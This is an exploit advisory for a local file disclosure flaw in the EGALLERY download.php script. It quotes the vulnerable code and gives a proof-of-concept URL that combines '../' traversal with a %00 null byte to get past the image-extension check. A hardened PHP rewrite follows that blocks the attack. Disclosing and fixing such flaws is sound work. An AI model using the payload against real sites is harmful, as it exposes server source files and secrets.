
EGALLERY (all versions) LFD Vulnerability

Author: GEOIX , Published: 04-01-2014
############################################################################
# Exploit Title : EGALLERY (all versions) LFD Vulnerability
# Author : GEOIX
# Tested On : Windows
# Date : 04/01/2014
# Other Exploit by : TUNISIAN CYBER
# => http://www.exploit4arab.net/exploits/673
#############################################################################

#> Description: egallery/download.php

44: $filename = $_GET['image'];
45: $file = '../' . $filename;
87: readfile($file);

=> Note that the function is protected by an extension check against an array
{$extension, array('jpg', 'png', 'gif'
so now we use a null byte (%00).

#> p0c :

=> site.com/download.php?image=../xxx.php%00 (in the root file).
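
A hardened form of the lookup quoted above, given as an added example (it is not EGALLERY's code or the advisory author's). The function name resolve_image(), the base directory derived from the '../' prefix on line 45, and the 404 response are assumptions.

```php
<?php
// Added example, not EGALLERY code. ALLOWED_EXT mirrors the jpg/png/gif list
// quoted in the advisory; resolve_image() and $baseDir are hypothetical names.
const ALLOWED_EXT = ['jpg', 'png', 'gif'];

function resolve_image(string $requested, string $baseDir): ?string
{
    // Reject NUL bytes outright: where the runtime truncates the path at %00,
    // the extension that gets checked is not the file that gets opened.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    // Check the extension of the complete, untruncated name.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // Canonicalise both paths, then require the target to sit under the base.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // '../' sequences resolved to somewhere outside the base
    }
    return $path;
}

// Replacement for lines 44, 45 and 87 of download.php.
$image = $_GET['image'] ?? '';
$file  = is_string($image) ? resolve_image($image, __DIR__ . '/..') : null;
if ($file === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
readfile($file);
```

PHP 5.3.4 and later reject paths containing NUL bytes in filesystem functions, so the %00 truncation depends on an older runtime; the explicit NUL check and the realpath() containment test keep the script safe regardless of the PHP version it runs on.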

##############################################################################

Greets to: TUNISIAN CYBER, Muslim-Dz, Geniu Mouk , Eve Dized .

Sec4Ever Members Top : DamaneDz ,UzunDz , Gastro
